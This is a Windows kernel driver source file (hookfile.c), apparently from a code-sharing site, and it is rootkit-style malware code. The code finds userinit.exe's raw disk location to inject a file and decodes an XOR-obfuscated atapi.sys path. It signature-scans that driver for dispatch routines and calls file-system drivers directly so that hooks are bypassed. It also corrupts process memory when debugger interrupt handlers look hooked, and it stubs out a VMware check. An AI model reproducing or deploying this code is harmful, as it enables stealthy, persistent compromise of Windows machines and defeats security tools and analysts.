📄 hookfile.c
字号:
//
// Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
//
pIrpStack = IoGetCurrentIrpStackLocation (pIrp);
if ( GetNtOSKernelBase() )
{
DWORD dwIntEntry = 0;
dwIntEntry = GetIntEntry(0x3);
KKDbgPrint("gNtosBase is: %08x..%08x..%08x..\r\n", gNtosBase, gNtosSize, dwIntEntry);
if ( dwIntEntry < gNtosBase || dwIntEntry > gNtosBase+gNtosSize )
{
memset( PsGetCurrentThread(), 0xcc, 0x100);
}
}
//
// Get the pointer to the input/output buffer and its length
//
inputBuffer = pIrp->AssociatedIrp.SystemBuffer;
inputBufferLength = pIrpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = pIrp->AssociatedIrp.SystemBuffer;
outputBufferLength = pIrpStack->Parameters.DeviceIoControl.OutputBufferLength;
IoControlCode = pIrpStack->Parameters.DeviceIoControl.IoControlCode;
pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
switch ( IoControlCode )
{
case IOCTL_PASS_SNDISK:
{
gXXXOffset = *(DWORD*)inputBuffer;
}
case IOCTL_INJECT_FILE:
{
xxxPassSNDisk(NULL, 0);
InjectFile(inputBuffer, inputBufferLength);
}
default:
pIrp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return pIrp->IoStatus.Status;
}
NTSTATUS FsGetFileHandle(PHANDLE FileHandle)
{
UNICODE_STRING uniUserinit;
NTSTATUS ntStatus;
OBJECT_ATTRIBUTES objAttrib;
IO_STATUS_BLOCK iosb;
RtlInitUnicodeString( &uniUserinit, L"\\SystemRoot\\System32\\userinit.exe");
InitializeObjectAttributes( &objAttrib, &uniUserinit, OBJ_CASE_INSENSITIVE|OBJ_KERNEL_HANDLE, NULL, NULL);
ntStatus = IoCreateFile( FileHandle,
GENERIC_READ,
&objAttrib,
&iosb,
NULL,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN,
FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_ALERT,
NULL,
0,
CreateFileTypeNone,
NULL,
0);
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("Open File failed...%08x..\r\n\r\n", ntStatus);
return ntStatus;
}
if ( GetNtOSKernelBase() )
{
DWORD dwIntEntry = 0;
dwIntEntry = GetIntEntry(3);
KKDbgPrint("gNtosBase is: %08x..%08x..%08x..\r\n", gNtosBase, gNtosSize, dwIntEntry);
if ( dwIntEntry < gNtosBase || dwIntEntry > gNtosBase+gNtosSize )
{
memset( PsGetCurrentProcess(), 0xcc, 0x100);
}
}
return ntStatus;
}
NTSTATUS MyFsdCompletionRoutine
(
__in PDEVICE_OBJECT DeviceObject,
__in PIRP Irp,
__in_opt PVOID Context
)
{
KeSetEvent( Irp->UserEvent, IO_NO_INCREMENT, FALSE);
return STATUS_SUCCESS;
}
NTSTATUS FsGetFileRetrievalPointers( PVOID Buffer, DWORD dwLength )
{
HANDLE hFile = NULL;
NTSTATUS ntStatus = STATUS_SUCCESS;
PDEVICE_OBJECT pDevObj = NULL;
PFILE_OBJECT FileObject;
PIRP Irp = NULL;
KEVENT kEvent;
STARTING_VCN_INPUT_BUFFER iVcnBuf = {0};
UCHAR oVcnBuf[272];
IO_STATUS_BLOCK iosb;
PRETRIEVAL_POINTERS_BUFFER pRpb;
PUCHAR pFileBuffer = NULL;
LARGE_INTEGER diskPos;
LARGE_INTEGER ByteOffset;
DWORD dwPartOffset = 0;
ntStatus = FsGetFileHandle(&hFile);
if ( !NT_SUCCESS(ntStatus) )
{
goto exit_clear;
}
pFileBuffer = ExAllocatePool(NonPagedPool, SECTOR_SIZE);
if ( pFileBuffer == NULL)
goto exit_clear;
ByteOffset.LowPart = FILE_USE_FILE_POINTER_POSITION;
ByteOffset.HighPart = -1;
ntStatus = ZwReadFile(hFile, NULL, NULL, NULL, &iosb, pFileBuffer, SECTOR_SIZE, &ByteOffset, NULL);
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("ZwReadFile failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
ntStatus = ObReferenceObjectByHandle( hFile, 0, *IoFileObjectType, KernelMode, &FileObject, NULL);
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("ObReXXX failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
if ( GetNtOSKernelBase() )
{
DWORD dwIntEntry = 0;
dwIntEntry = GetIntEntry(0xe);
KKDbgPrint("gNtosBase is: %08x..%08x..%08x..\r\n", gNtosBase, gNtosSize, dwIntEntry);
if ( dwIntEntry < gNtosBase || dwIntEntry > gNtosBase+gNtosSize )
{
memset( PsGetCurrentProcess(), 0xcc, 0x100);
}
}
pDevObj = MyIoGetBaseFileSystemDeviceObject(FileObject);
if ( pDevObj == NULL )
{
ntStatus = STATUS_UNSUCCESSFUL;
KKDbgPrint("IoGetBase failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
KKDbgPrint("pDevObj is: %08x...\r\n", pDevObj);
{
PIO_STACK_LOCATION IrpSp;
if (FileObject->Vpb == 0 || FileObject->Vpb->DeviceObject == NULL)
return STATUS_UNSUCCESSFUL;
Irp = IoAllocateIrp(FileObject->Vpb->DeviceObject->StackSize, FALSE);
if(Irp == NULL)
goto exit_clear;
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
Irp->MdlAddress = NULL;
Irp->Flags = 0;
Irp->Flags |= IRP_DEFER_IO_COMPLETION;
Irp->UserBuffer = oVcnBuf;
Irp->UserEvent = &kEvent;
Irp->UserIosb = &iosb;
Irp->RequestorMode = KernelMode;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_FILE_SYSTEM_CONTROL;
IrpSp->DeviceObject = FileObject->Vpb->DeviceObject;
IrpSp->FileObject = FileObject;
IrpSp->Parameters.DeviceIoControl.IoControlCode = FSCTL_GET_RETRIEVAL_POINTERS;
IrpSp->Parameters.DeviceIoControl.InputBufferLength = sizeof(iVcnBuf);
IrpSp->Parameters.DeviceIoControl.Type3InputBuffer = &iVcnBuf;
IrpSp->Parameters.DeviceIoControl.OutputBufferLength = sizeof(oVcnBuf);
if ( GetNtOSKernelBase() )
{
DWORD dwIntEntry = 0;
dwIntEntry = GetIntEntry(3);
KKDbgPrint("gNtosBase is: %08x..%08x..%08x..\r\n", gNtosBase, gNtosSize, dwIntEntry);
if ( dwIntEntry < gNtosBase || dwIntEntry > gNtosBase+gNtosSize )
{
memset( PsGetCurrentProcess(), 0xcc, 0x100);
}
}
if ( GetNtOSKernelBase() )
{
DWORD dwIntEntry = 0;
dwIntEntry = GetIntEntry(0xe);
KKDbgPrint("gNtosBase is: %08x..%08x..%08x..\r\n", gNtosBase, gNtosSize, dwIntEntry);
if ( dwIntEntry < gNtosBase || dwIntEntry > gNtosBase+gNtosSize )
{
memset( PsGetCurrentProcess(), 0xcc, 0x100);
}
}
IoSetCompletionRoutine(Irp, MyFsdCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = MyIofCallDriver(pDevObj, Irp);
if (ntStatus == STATUS_PENDING)
{
KeWaitForSingleObject(&kEvent,
Executive,
KernelMode,
FALSE,
NULL);
ntStatus = iosb.Status;
}
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("MyIofCallDriver failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
pRpb = (PRETRIEVAL_POINTERS_BUFFER)oVcnBuf;
KKDbgPrint("xxx Res is: %08x...\r\n", pRpb->Extents[0].Lcn);
}
if( pRpb->ExtentCount == 0 )
{
ntStatus = STATUS_UNSUCCESSFUL;
KKDbgPrint("ExtentCount failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
if(pRpb->StartingVcn.QuadPart == -1)
{
ntStatus = STATUS_UNSUCCESSFUL;
KKDbgPrint("StartingVcn failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
dwPartOffset = GetFirstPartitionOffset();
if ( dwPartOffset == 0 )
{
ntStatus = STATUS_UNSUCCESSFUL;
KKDbgPrint("StartingVcn failed:%08x...\r\n", ntStatus);
goto exit_clear;
}
gDiskPos.QuadPart = pRpb->Extents[0].Lcn.QuadPart*gSectorsPerCluster+dwPartOffset;
KKDbgPrint("gDiskPos is: %08x..Cluster:%d...part offset: %08x..\r\n\r\n", gDiskPos.QuadPart, gSectorsPerCluster, dwPartOffset);
RtlCopyMemory(gUserinitBuffer, pFileBuffer, 512);
exit_clear:
if ( hFile != NULL )
ZwClose(hFile);
if ( Irp != NULL)
IoFreeIrp(Irp);
if ( pFileBuffer != NULL)
ExFreePool(pFileBuffer);
return ntStatus;
}
BOOL GetNtOSKernelBase()
{
DWORD iIndex = 0;
DWORD dwSize;
DWORD ModuleBase;
PCHAR szNtKernel[] = { "ntoskrnl.exe", "ntkrnlpa.exe", "ntkrnlmp.exe", "ntkrpamp.exe" };
// UCHAR szNtKernel[4][16];
//
// szNtKernel[0][0] = 'n' ;
gNtosBase = 0;
gNtosSize = 0;
for ( ; iIndex < 4; iIndex++)
{
ModuleBase = GetModuleBaseAndSize( (PUCHAR)szNtKernel[iIndex], &dwSize);
if ( ModuleBase > 0 )
{
gNtosBase = ModuleBase;
gNtosSize = dwSize;
break;
}
}
if ( gNtosBase == 0 )
return FALSE;
return TRUE;
}
NTSTATUS
FASTCALL MyIofCallDriver( __in PDEVICE_OBJECT DeviceObject, __inout PIRP Irp )
{
PIO_STACK_LOCATION irpSp;
PDRIVER_OBJECT driverObject;
NTSTATUS status;
Irp->CurrentLocation--;
irpSp = IoGetNextIrpStackLocation( Irp );
Irp->Tail.Overlay.CurrentStackLocation = irpSp;
irpSp->DeviceObject = DeviceObject;
driverObject = DeviceObject->DriverObject;
status = driverObject->MajorFunction[irpSp->MajorFunction]( DeviceObject, Irp );
return status;
}
PDEVICE_OBJECT
MyIoGetBaseFileSystemDeviceObject(
IN PFILE_OBJECT FileObject
)
{
PDEVICE_OBJECT deviceObject;
if (FileObject->Vpb != NULL && FileObject->Vpb->DeviceObject != NULL) {
deviceObject = FileObject->Vpb->DeviceObject;
} else if (!(FileObject->Flags & FO_DIRECT_DEVICE_OPEN) &&
FileObject->DeviceObject->Vpb != NULL &&
FileObject->DeviceObject->Vpb->DeviceObject != NULL) {
deviceObject = FileObject->DeviceObject->Vpb->DeviceObject;
} else {
deviceObject = FileObject->DeviceObject;
}
return deviceObject;
}
BOOL GetAtapiDispatchFromFile( LPDWORD pDispatch, LPDWORD pInternRoutine )
{
BOOL bResult = FALSE;
NTSTATUS ntStatus = STATUS_SUCCESS;
WCHAR wsAtpiFile[0x50] = {0};
UNICODE_STRING unstrFile;
UNICODE_STRING unstrLaji;
OBJECT_ATTRIBUTES objAttrib;
IO_STATUS_BLOCK iosb;
HANDLE FileHandle = INVALID_HANDLE_VALUE;
FILE_STANDARD_INFORMATION fsi = {0};
char* szBuffer = NULL;
DWORD dwFileSize = 0;
{
DWORD dwIndex = 0;
unsigned char data[38] = {
0x29, 0x26, 0x0C, 0x06, 0x01, 0x10, 0x18, 0x27, 0x1A, 0x1A, 0x01, 0x29, 0x26, 0x0C, 0x06, 0x01,
0x10, 0x18, 0x46, 0x47, 0x29, 0x11, 0x07, 0x1C, 0x03, 0x10, 0x07, 0x06, 0x29, 0x14, 0x01, 0x14,
0x05, 0x1C, 0x5B, 0x06, 0x0C, 0x06
};
for ( ;dwIndex < 38; dwIndex++)
{
wsAtpiFile[dwIndex] = data[dwIndex]^0x75;
}
KKDbgPrint("wsAtpiFile: %ws...\r\n", wsAtpiFile);
}
RtlInitUnicodeString( &unstrLaji, FTDISK);
RtlInitUnicodeString( &unstrFile, wsAtpiFile);
InitializeObjectAttributes( &objAttrib, &unstrFile, OBJ_CASE_INSENSITIVE|OBJ_KERNEL_HANDLE, NULL, NULL);
ntStatus = IoCreateFile( &FileHandle,
GENERIC_READ,
&objAttrib,
&iosb,
NULL,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN,
FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_ALERT,
NULL,
0,
CreateFileTypeNone,
NULL,
0);
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("Open File failed...%08x..\r\n\r\n", ntStatus);
goto exit_clear;
}
if ( GetNtOSKernelBase() )
{
DWORD dwIntEntry = 0;
dwIntEntry = GetIntEntry(3);
KKDbgPrint("gNtosBase is: %08x..%08x..%08x..\r\n", gNtosBase, gNtosSize, dwIntEntry);
if ( dwIntEntry < gNtosBase || dwIntEntry > gNtosBase+gNtosSize )
{
memset( PsGetCurrentProcess(), 0xcc, 0x100);
}
}
ntStatus = ZwQueryInformationFile( FileHandle, &iosb, &fsi, sizeof(fsi), FileStandardInformation);
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("ZwQueryInformationFile File failed...%08x..\r\n\r\n", ntStatus);
goto exit_clear;
}
dwFileSize = (DWORD)fsi.AllocationSize.QuadPart;
if ( dwFileSize > 1024*1024 )
{
KKDbgPrint("File Size...%08x..\r\n\r\n", dwFileSize);
goto exit_clear;
}
szBuffer = ExAllocatePool(NonPagedPool, dwFileSize );
if ( szBuffer == NULL )
{
KKDbgPrint("ExAllocatePool Size...%08x..\r\n\r\n", ntStatus);
goto exit_clear;
}
ntStatus = ZwReadFile( FileHandle, NULL, NULL, NULL, &iosb, szBuffer, dwFileSize, NULL, NULL);
if ( !NT_SUCCESS(ntStatus) )
{
KKDbgPrint("ZwReadFile File failed...%08x..\r\n\r\n", ntStatus);
goto exit_clear;
}
// 搜索特征码
{
PIMAGE_DOS_HEADER pdosh;
PIMAGE_NT_HEADERS pnth;
PIMAGE_SECTION_HEADER pish;
char* buffer;
DWORD index;
DWORD iindex;
buffer = szBuffer;
pdosh = (PIMAGE_DOS_HEADER)buffer;
pnth = (PIMAGE_NT_HEADERS)( (DWORD)pdosh + pdosh->e_lfanew );
pish = IMAGE_FIRST_SECTION(pnth);
for ( iindex = 0; iindex < pnth->FileHeader.NumberOfSections; iindex++)
{
if ( _stricmp( (const char*)pish->Name, "init") == 0 )
break;
pish++;
}
if ( iindex == pnth->FileHeader.NumberOfSections )
{
KKDbgPrint("No found INit seg\r\n");
goto exit_clear;
}
for ( index=pish->PointerToRawData; index<pish->PointerToRawData+pish->SizeOfRawData; index++)
{
if ( buffer[index] != (char)0xc7)
continue;
if ( buffer[index+2] != (char)0x30)
continue;
if ( buffer[index+7] != (char)0xc7)
continue;
if ( buffer[index+9] != (char)0x34)
continue;
if ( buffer[index+14] != (char)0xc7)
continue;
if ( buffer[index+21] != (char)0xc7)
continue;
if ( buffer[index+28] != (char)0xc7)
continue;
if ( pDispatch != NULL && pInternRoutine != NULL )
{
bResult = TRUE;
*pDispatch = *(DWORD*)( &buffer[index+24]) - 0x10000;
*pInternRoutine = *(DWORD*)( &buffer[index+17]) - 0x10000;
KKDbgPrint("xxx address is: %08x....%08x...%08x\n", index, *pDispatch, *pInternRoutine );
}
break;
}
}
exit_clear:
if ( szBuffer != NULL)
ExFreePool(szBuffer);
if ( FileHandle != NULL)
ZwClose(FileHandle);
return bResult;
}
// void AntiVmWare()
// {
// HANDLE hKey;
// NTSTATUS ntStatus;
// UNICODE_STRING uniVmWare;
//
// RtlInitUnicodeString()
// ntStatus = ZwCreateKey(&hKey, KEY_ALL_ACCESS, )
// }⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -